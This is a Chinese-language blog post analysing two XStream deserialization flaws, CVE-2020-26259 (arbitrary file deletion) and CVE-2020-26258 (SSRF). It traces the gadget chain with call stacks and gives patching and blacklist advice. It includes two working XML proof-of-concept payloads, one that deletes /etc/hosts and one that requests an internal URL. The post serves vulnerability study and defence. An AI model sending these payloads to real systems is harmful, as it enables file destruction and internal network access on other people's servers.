[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞

220 篇文章 7 订阅
213 篇文章 3 订阅

漏洞详情

CVE-2020-26259:
任意文件删除。
在这里插入图片描述

细节

Xstream转换Map的时候会拿到
会计算Map的Key的hash值:
在这里插入图片描述
这里的key是jdk.nashorn.internal.objects.NativeString类型,
继续调用hashCode方法
在这里插入图片描述
在C:\Program Files\Java\jdk1.8.0_172\jre\lib\ext\nashorn.jar!\jdk\nashorn\internal\objects\NativeString的hashCode方法中
在这里插入图片描述
在这里插入图片描述
调用这里:

<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>

指定class的toString方法,
在这里插入图片描述
这里的InputStream是

<is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>

指定的class类型。
在这里插入图片描述
在其close方法中触发了文件删除操作:
在这里插入图片描述
部分调用栈:

close:145, ReadAllStream$FileStream (com.sun.xml.internal.ws.util)
get:183, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data的get方法中,调用了InpuStream(这里是指定的com.sun.xml.internal.ws.util.ReadAllStream$FileStream)的close方法,而在这个特殊的InputStream里进行了删除临时文件操作,实现了任意文件删除。
在这里插入图片描述

CVE-2020-26258:
SSRF

在这里插入图片描述

细节

在这里插入图片描述

调用栈:

getInputStream:107, URLDataSource (javax.activation)
get:181, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:121, NativeString (jdk.nashorn.internal.objects)
hashCode:117, NativeString (jdk.nashorn.internal.objects)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1268, XStream (com.thoughtworks.xstream)
fromXML:1259, XStream (com.thoughtworks.xstream)
parseXml:29, XStreamRce (org.joychou.controller)

在这里插入图片描述

poc

[CVE-2020-26258] SSRF

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://localhost:8080/internal/:</url>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

[CVE-2020-26259]任意文件删除

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='com.sun.xml.internal.ws.util.ReadAllStream$FileStream'>
              <tempFile>/etc/hosts</tempFile>
            </is>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

修复建议

升级至 1.4.15 版本,下载链接为:

https://x-stream.github.io/changes.html#1.4.15

临时修补建议
低于 1.4.15 的不同版本用户可以按照以下代码设置黑名单:

  • 使用 XStream 1.4.14 的用户,只需在 XStream 的设置代码中添加两行即可:
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.13 的用户,只需在XStream的设置代码中添加三行代码即可:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.7 到 1.4.12 的用户,需要设置多个黑名单:
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
  • 使用 XStream 1.4.6 或更低版本的用户可以注册自己的 Converter ,以防止反序列化当前已知的有危害的 Java 类型。
xstream.registerConverter(new Converter() {
  public boolean canConvert(Class type) {
|type.getName().equals("javax.imageio.ImageIO$ContainsFilter")|type.getName().equals("jdk.nashorn.internal.objects.NativeString")| |
|type == java.lang.Void.class|void.class|Proxy.isProxy(type)|
|type.getName().startsWith("javax.crypto.")|type.getName().endsWith("$LazyIterator")|type.getName().endsWith(".ReadAllStream$FileStream"));|
  }


  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }


  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
    throw new ConversionException("Unsupported type due to security reasons.");
  }
}, XStream.PRIORITY_LOW);

参考

这个组件对漏洞的修复方式也是黑名单的,会不会也出现像fastjson一样的情况。

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值